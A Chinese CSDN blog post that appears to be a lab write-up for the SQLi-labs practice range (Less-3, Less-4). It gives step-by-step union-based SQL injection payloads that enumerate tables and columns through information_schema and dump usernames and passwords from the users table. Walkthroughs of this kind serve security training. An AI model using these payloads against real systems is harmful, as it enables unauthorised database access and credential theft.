靶场攻击利用

最新推荐文章于 2023-11-13 16:58:06 发布
最新推荐文章于 2023-11-13 16:58:06 发布
阅读量487 收藏 1
点赞数
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qiuwen111/article/details/125221289
版权
1) 第三关: Less-3
访问第一关主页,显示输入 id 参数

 查看后端代码 index.php,可看到实际查询的语句

输入 http://127.0.0.1:8888/Less-3/?id=1’)and 1=2 -- -,发现存在 sql 注入漏洞  

检索字段数 http://localhost:8888/Less-1/?id=1’ )order by 4 -- -,执行失败,列数为3

 使用联合语句 union 来查询

 输入 http://localhost:8888/Less-1/?id=444’) union select 1,2,3 -- -,成功执行全部列记录,

发现只有 2 3 可以用,接下来我们就利用 2 3 来查询数据库的信息

联合利用数据库内置函数:
输入 http://localhost:8888/Less-1/?id=444') union select 1,2,database() -- - ;爆出当前数据
库名 :security

 联合利用 mysql 数据库本身的 information_schema

输 入 http://localhost:8888/Less-1/?id=444') union select 1,2,group_concat(table_name)

from information_schema.tables where table_schema='security' -- - ;爆出 security 数据
库所有表名
输入 http://localhost:8888/Less-1/?id=444')union select 1,2,group_concat(column_name)
from information_schema.columns where table_schema='security' and table_name='users'
-- - ;爆出 users 表列名

 

输入 http://localhost:8888/Less-1/?id=444') union select 1,2,group_concat(username,'--
',password) from security.users -- - ;爆出关键敏感信息

 

 1) 第四关:Less-4

操作如上:完成图例如下

 

 

 

 

 

 

 

 

 

 

 

qiuwen111
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络靶场攻防综合实验
weixin_46605806的博客
12-20 5983
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之黑”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
攻击narak靶场
qq_62638044的博客
03-16 483
攻击narak靶场
渗透学习-靶场篇-WebGoat靶场(JWT攻击
qq_43696276的博客
12-11 2362
本次主要学习了javaweb项目方面任意出现的一些安全问题,最主要的是有关于JWT身份认证上的攻击,并利用webgoat靶场进行了一些实验。JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验证token,通过token验证用户身份。基于token的身份验证可以替代传统的cookie+session身份验证方法。jwt由三个部分组成:header.payload.signature。
xss攻击靶场示例
weixin_46954909的博客
10-27 1574
本篇主要是记录作者自己在解题的答案,以及一些方法。仅作为参考,与记录。
pikachu靶场,dvwa靶场之xss攻击
西电卢本伟的博客
04-01 2081
xss攻击,pikachu靶场,dvwa靶场
开源靶场zsbdzsbd
04-19
参与者可以尝试利用这些漏洞,模拟黑客攻击,同时学习如何防御此类攻击。这样的实践有助于提高对网络安全威胁的理解,培养安全意识,并锻炼在实际工作中应对安全事件的能力。 在"vulhub-master"这个项目中,你可能...
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu-master靶场
07-14
通过参与pikachu靶场的挑战,学习者可以了解并实践如何发现和利用各种类型的漏洞,同时也能学习如何防御这些攻击靶场通常分为几个等级,从初级到高级,涵盖了Web应用安全、系统安全、网络协议分析等多个方面。...
vulhub漏洞测试靶场
08-16
"vulhub-master"可能包含了详细的使用指南、漏洞描述、PoC(Proof of Concept)代码等学习资料,这些资料可以帮助用户更好地理解和利用提供的靶场环境。 6. **实战演练**: 通过Vulhub,用户不仅可以理论学习,还...
Web六大靶场靶场.rar
05-03
靶场中,你可能会遇到的任务可能包括找出并利用XSS漏洞,然后修复它们,或者设置自己的防护机制,以提高对Web应用安全的理解和实战能力。总的来说,"Web六大靶场靶场.rar"提供了一个宝贵的平台,帮助你深入理解和...
一次极其曲折的多层靶场渗透--渗透攻击红队靶场
include_voidmain的博客
11-03 620
一次极其曲折的多层靶场渗透--渗透攻击红队靶场
网测科技_Web攻击靶场测试案例
最新发布
Netitest的博客
11-13 309
Web攻击靶场测试案例
攻防靶场|Vulnstack2靶场之CS实战
weixin_42282189的博客
11-19 4154
作者: 不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 最近学点攻防,拿靶场练练手,大佬轻喷哈。 靶场简介: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。 Bypass UAC Wind.
【网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 4817
借助DVWA靶场,对用户登录进行渗透测试
渗透初识之DVWA靶场搭建及使用(详细图文)
m0_60884805的博客
09-28 2万+
我将环境搭在win7,漏洞环境建议还是在虚拟机上搭建。
16个网络安全常用的练习靶场(小白必备)
qq_44005305的博客
01-31 2641
DVWA-WooYun是一个基于DVWA的PHP+Mysql漏洞模拟练习环境,通过将乌云主站上的有趣漏洞报告建模,以插件形式复现给使用该软件的帽子们,可以让乌云帽子们获得读报告体验不到的真实感,在实践的过程中可以无缝隙地深入理解漏洞的原理及利用方式 中英双字,如果您语文学的不好不必担心了,界面提示英文的(DVWA原厂),内容提示中英双字(后来觉得比较眼花,所以去掉了部分英文)这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 3731
1JAVA环境。
常见渗透测试靶场系统
热门推荐
tasty
09-09 2万+
常见靶场 DVWA (Dam Vulnerable Web Application) DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae mutillidaemutillidae是一个免费
DVWA靶场笔记之爆破攻击原理
Alonegrief的博客
11-18 1827
DVWA漏洞源码分析——(一)Brute Force 打开dvwa,级别调为low之后选择brute fore 源码分析 打开源码,分析源码内容 这段源码的意思是get传参$user和$pass,而这里还有就是传进来的参数会转成md5的格式,执行mysql语句查询数据库,验证账号和密码是否正确 打开burp,进行抓包暴力破解 burp有四种暴力破解类型: sniper:一个字典,两个参数,先匹配第一项在匹配第二项 Battering ram:一个字典,两个参数,同用户名同密码 Pitchfork:两个字典,
dvwa靶场xss攻击
09-25
DVWA靶场是一个用于学习和测试网络安全漏洞的虚拟环境。在DVWA靶场中,有一个特定的漏洞被称为XSS(跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行攻击。通过在受害者浏览器中执行恶意脚本,攻击者可以窃取用户的敏感信息、劫持用户会话或者操纵网页内容。 在DVWA靶场中,有两种XSS攻击方式:存储型XSS和反射型XSS。存储型XSS攻击是指攻击者将恶意代码嵌入到后台服务器的存储区域,当其他用户访问这个页面时,恶意代码就会被执行。而反射型XSS攻击是通过欺骗用户点击一个包含恶意代码的链接来实现攻击。 要在DVWA靶场进行XSS攻击,可以按照以下步骤进行: 1. 首先,需要确定XSS漏洞的存在,可以通过尝试在输入框中插入一些特殊字符或标签,如<script>标签,来判断是否能成功执行恶意代码。 2. 如果成功执行了恶意代码,可以尝试构造payload来获取用户的cookie等敏感信息。 3. 进一步,可以尝试利用XSS漏洞来进行会话劫持或者篡改网页内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值